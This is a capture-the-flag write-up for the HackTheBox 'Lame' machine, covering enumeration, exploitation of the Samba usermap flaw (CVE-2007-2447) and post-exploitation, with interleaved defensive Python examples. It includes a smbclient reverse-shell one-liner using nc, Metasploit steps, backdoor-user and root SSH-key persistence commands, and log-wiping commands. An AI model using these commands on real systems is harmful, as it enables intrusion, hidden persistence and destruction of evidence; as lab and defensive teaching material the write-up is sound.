HackTheBox Lame
Writeup for HackTheBox Lame
Machine Synopsis
IP Address: 10.10.10.3
Key Exploitation Techniques:
- Remote Code Execution (RCE) through a vulnerability in Samba's usermap script (CVE-2007-2447).
- Immediate root access upon exploitation.
1. Enumeration
Initial reconnaissance with nmap revealed several open ports related to common network services.

```bash
nmap -p- --min-rate 10000 10.10.10.3 -oN nmap_portscan.txt
nmap -p 21,22,139,445 -sC -sV 10.10.10.3 -oN nmap_services.txt
```
Nmap Results:
- Port 21 (FTP): vsftpd 2.3.4 with anonymous login enabled.
- Port 22 (SSH): OpenSSH 4.7p1 Debian.
- Ports 139 & 445 (SMB/CIFS): Samba smbd 3.0.20-Debian.

The versions of vsftpd and Samba are very old and likely contain known vulnerabilities.
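The "old version, probably vulnerable" judgement above is something a defender can automate against their own service inventory. The script below is an added example (not from the writeup) that parses nmap -sV style output and flags the two banners found here: vsftpd 2.3.4 (the release that shipped with a backdoor) and Samba older than 3.0.25 (the first release that fixed CVE-2007-2447). The nmap text is constructed to match the results above, not copied scan output, and the rule table is deliberately tiny.

```python
"""
Added example, not part of the original writeup: turn an nmap -sV service
list into a "known-bad version" report. The two rules encode what the
enumeration found: vsftpd 2.3.4 is the release that shipped with a backdoor,
and Samba before 3.0.25 is affected by CVE-2007-2447 (username map script).
The nmap text below is constructed to match the writeup's results.
"""
import re

# Constructed sample in nmap's normal -sV output layout (assumed, for the demo).
SAMPLE_NMAP = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian
139/tcp open  netbios-ssn Samba smbd 3.0.20-Debian
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian
"""

LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(.*)$")
VERSION_RE = re.compile(r"\d+(?:\.\d+)+")


def version_tuple(text):
    """'3.0.20' -> (3, 0, 20) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def parse_services(nmap_text):
    """Extract open ports with their service name and version banner."""
    services = []
    for line in nmap_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(3) != "open":
            continue
        services.append({
            "port": int(m.group(1)),
            "proto": m.group(2),
            "service": m.group(4),
            "version": m.group(5).strip(),
        })
    return services


def assess(service):
    """Return a finding string for a banner that matches a known-bad rule, else None."""
    banner = service["version"]
    m = VERSION_RE.search(banner)
    if not m:
        return None
    number = version_tuple(m.group(0))
    if banner.startswith("vsftpd") and number == (2, 3, 4):
        return "vsftpd 2.3.4: backdoored release, upgrade or remove the service"
    if banner.startswith("Samba smbd") and number < (3, 0, 25):
        return "Samba < 3.0.25: CVE-2007-2447 username map script RCE, upgrade"
    return None


def report(nmap_text):
    """List of (port, finding) for every open service that trips a rule."""
    findings = []
    for service in parse_services(nmap_text):
        note = assess(service)
        if note:
            findings.append((service["port"], note))
    return findings


if __name__ == "__main__":
    for port, note in report(SAMPLE_NMAP):
        print(f"{port}/tcp  {note}")
```

Versions are compared as integer tuples rather than strings so that 3.0.20 sorts below 3.0.25; a real inventory check would feed the rule table from a vulnerability database instead of two hard-coded entries.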
2. Vulnerability Research & Exploitation
Failed Exploit Attempt: vsftpd 2.3.4
A searchsploit lookup for vsftpd 2.3.4 immediately returns a backdoor command execution exploit. We attempted to use the Metasploit module for this vulnerability.

```
msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
```
This exploit failed to create a session. This is a common occurrence with older exploits; they may not work as expected or the vulnerability may have been patched in a non-standard way.
Successful Exploit: Samba usermap Script (CVE-2007-2447)
A search for Samba 3.0.20 revealed a critical remote code execution vulnerability related to the usermap script. It allows an attacker to execute arbitrary commands as the root user by injecting shell commands into the username field of an SMB login request.
Why it Worked: The usermap script in this version of Samba does not escape shell metacharacters in the username before handing it to the configured map script through a shell. By sending a specially crafted username that begins with a forward slash (/) and contains a shell command enclosed in backticks (``), the system executes the command with root privileges.
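The root cause described above is a classic unescaped shell-out, and the fix is the same one any service that maps user-supplied names onto a script needs. The code below is an added example, not Samba's code and not from the writeup: it validates a login name against a strict allow-list and runs the map script with an argv list and no shell, so the name can only ever be data. The demo map script (a stand-in that maps each name to itself) and the sample usernames are assumptions for the demo.

```python
"""
Added example, not part of the original writeup or of Samba: the username
handling behind CVE-2007-2447, seen from the defender's side. Vulnerable
Samba handed the SMB login name to the configured "username map script"
through a shell, so metacharacters in the name were interpreted as commands.
The hardened handler below validates the name against a strict allow-list and
invokes the script with an argv list and no shell, so the name stays data.
The demo map script and the sample usernames are assumptions.
"""
import os
import re
import subprocess
import sys
import tempfile

# Allow-list for account names: letters, digits, '.', '_', '-' and an optional
# trailing '$' for machine accounts. Nothing in this set is special to /bin/sh.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9._-]{1,32}\$?")


def is_safe_map_username(username):
    """True only when the whole name matches the allow-list."""
    return SAFE_USERNAME.fullmatch(username) is not None


def map_user(script_argv, username):
    """Run the map script for one username without involving a shell.

    script_argv is the command prefix (e.g. [interpreter, script_path]); the
    username is appended as a separate argument and reaches the script as $1
    verbatim, never re-parsed. Names that fail validation raise ValueError,
    which is the category the writeup's '/=`...`' payload falls into.
    """
    if not is_safe_map_username(username):
        raise ValueError(f"refusing to map suspicious username: {username!r}")
    result = subprocess.run(
        list(script_argv) + [username],
        capture_output=True, text=True, check=True,  # shell=False is the default
    )
    return result.stdout.strip()


def rejects(script_argv, username):
    """Helper for checks: True if map_user refuses the name."""
    try:
        map_user(script_argv, username)
    except ValueError:
        return True
    return False


def make_demo_map_script():
    """Write a stand-in map script (assumed, for the demo) that prints its first
    argument, i.e. maps every name to itself. Returns the argv prefix to run it."""
    fd, path = tempfile.mkstemp(suffix=".py")
    with os.fdopen(fd, "w") as handle:
        handle.write("import sys\nprint(sys.argv[1])\n")
    return [sys.executable, path]


if __name__ == "__main__":
    script = make_demo_map_script()
    print(map_user(script, "makis"))      # a normal name is mapped
    print(rejects(script, "/=`id`"))      # constructed injection-shaped name is refused
```

Two layers matter here: the allow-list stops the request at the boundary, and the argv invocation means that even a name that slipped past validation would arrive in the script as a single literal argument rather than being re-parsed by a shell.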
We used a Python exploit script that automates this process.
```bash
# Attacker Machine: Setup a netcat listener to catch the reverse shell.
nc -nlvp 1234
```

```bash
# Attacker Machine: Execute the Python exploit.
python usermap_script.py 10.10.10.3 445 10.10.14.3 1234
```
The script successfully sent the payload, which triggered a reverse shell connection to our netcat listener.

```
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.3] 34329
id
# uid=0(root) gid=0(root) groups=0(root)
```
The id command confirmed we had successfully gained a root shell, bypassing the need for a separate privilege escalation step.
3. Flag Retrieval
With immediate root access, we could now retrieve both the user.txt and root.txt flags.

```bash
cd /home/makis
cat user.txt
<redacted>
cd /root
cat root.txt
<redacted>
```
4. Alternative Exploitation Methods
Method 1: Metasploit
Metasploit has a dedicated module for this vulnerability, which is a simpler and more reliable approach.
```
msfconsole -q
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.3
msf6 exploit(multi/samba/usermap_script) > set LPORT 4444
msf6 exploit(multi/samba/usermap_script) > run
```
Method 2: Manual SMB Client
This technique uses the built-in smbclient utility to trigger the vulnerability manually. The payload is injected directly into the logon command.

```bash
# Set up a listener
nc -nlvp 1337
# Execute the command from another terminal
smbclient //10.10.10.3/tmp -c 'logon "/=`nohup nc -e /bin/sh 10.10.14.3 1337`"'
```
This method is less verbose and demonstrates a deeper understanding of the vulnerability without relying on pre-built scripts.
5. Post-Exploitation and Defense Evasion
Persistence
SSH Key: Install an SSH public key for reliable, passwordless root access.

```bash
mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8..." >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
```
Backdoor User: Create a new root-level user.

```bash
useradd -m -s /bin/bash backup
echo 'backup:password' | chpasswd
echo 'backup ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
```
Defense Evasion
Log Cleanup: Clear various system and application logs to remove evidence of the compromise.

```bash
echo > /var/log/auth.log
echo > /var/log/syslog
echo > /var/log/samba/log.smbd
history -c
```
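Seen from the defender's side, the persistence and log-cleanup steps in this section leave a small, recognisable footprint: a passwordless sudo grant, a login account that is not in the baseline, a key in root's authorized_keys nobody provisioned, and log files reduced to a single newline. The audit below is an added example, not part of the writeup, that checks for exactly that on constructed sample data; the baseline user and key sets, the watched-log list and the placeholder key blob are all assumptions for the demo.

```python
"""
Added example, not part of the original writeup: a small host audit that looks
for the persistence and log-cleanup artifacts the commands above leave behind
(a passwordless sudo grant, an account outside the baseline, an unknown key in
root's authorized_keys, and log files truncated to a single newline). It works
on file contents passed in as strings plus a size map, so it runs offline; the
sample inputs, the baseline user/key sets and the watched-log list are all
constructed for the demo.
"""
import re

# Constructed inputs mirroring the state the post-exploitation commands leave behind.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
makis:x:1000:1000:makis:/home/makis:/bin/bash
backup:x:1001:1001::/home/backup:/bin/bash
"""
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL) ALL
%admin ALL=(ALL) ALL
backup ALL=(ALL) NOPASSWD: ALL
"""
# Placeholder key blob; a real file holds a full base64-encoded key.
SAMPLE_ROOT_AUTH_KEYS = "ssh-rsa AAAAB3NzaC1yc2E...PLACEHOLDER intruder@example\n"
# Sizes in bytes: `echo > file` leaves exactly one newline behind.
SAMPLE_LOG_SIZES = {
    "/var/log/auth.log": 1,
    "/var/log/syslog": 1,
    "/var/log/samba/log.smbd": 1,
    "/var/log/dpkg.log": 48213,
}
WATCHED_LOGS = ["/var/log/auth.log", "/var/log/syslog",
                "/var/log/samba/log.smbd", "/var/log/dpkg.log"]
BASELINE_USERS = frozenset({"root", "daemon", "makis"})
BASELINE_ROOT_KEYS = frozenset()  # a clean baseline has no root keys at all

NOPASSWD_ALL = re.compile(r"^\s*(\S+)\s+ALL\s*=\s*\(ALL(?::ALL)?\)\s*NOPASSWD:\s*ALL\s*$")


def unexpected_sudo_grants(sudoers_text, allowed=frozenset({"root"})):
    """Principals given passwordless, unrestricted sudo that are not expected to have it."""
    return [m.group(1) for m in map(NOPASSWD_ALL.match, sudoers_text.splitlines())
            if m and m.group(1) not in allowed]


def unknown_login_accounts(passwd_text, baseline):
    """Accounts with a real login shell that are missing from the baseline."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue
        name, shell = fields[0], fields[6]
        if name not in baseline and shell not in ("/usr/sbin/nologin", "/bin/false"):
            found.append(name)
    return found


def unknown_root_keys(auth_keys_text, baseline):
    """Keys in root's authorized_keys not in the baseline; compared as 'type blob', comment ignored."""
    keys = []
    for line in auth_keys_text.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        key = f"{parts[0]} {parts[1]}"
        if key not in baseline:
            keys.append(key)
    return keys


def truncated_logs(sizes, watched):
    """Watched logs that are missing, empty, or a lone newline (the `echo > log` footprint)."""
    return [path for path in watched if sizes.get(path) is None or sizes[path] <= 1]


def audit(passwd=SAMPLE_PASSWD, sudoers=SAMPLE_SUDOERS,
          auth_keys=SAMPLE_ROOT_AUTH_KEYS, sizes=SAMPLE_LOG_SIZES):
    """Collect every finding in one dict; empty lists mean nothing suspicious was seen."""
    return {
        "sudo": unexpected_sudo_grants(sudoers),
        "accounts": unknown_login_accounts(passwd, BASELINE_USERS),
        "root_keys": unknown_root_keys(auth_keys, BASELINE_ROOT_KEYS),
        "logs": truncated_logs(sizes, WATCHED_LOGS),
    }


if __name__ == "__main__":
    for category, items in audit().items():
        print(f"{category}: {items or 'ok'}")
```

On a live host the same functions would be fed the real /etc/passwd, /etc/sudoers and /root/.ssh/authorized_keys contents and os.stat sizes; the point of the truncation check is that a log which should be growing and is suddenly one byte long is itself the signal, regardless of what was removed from it.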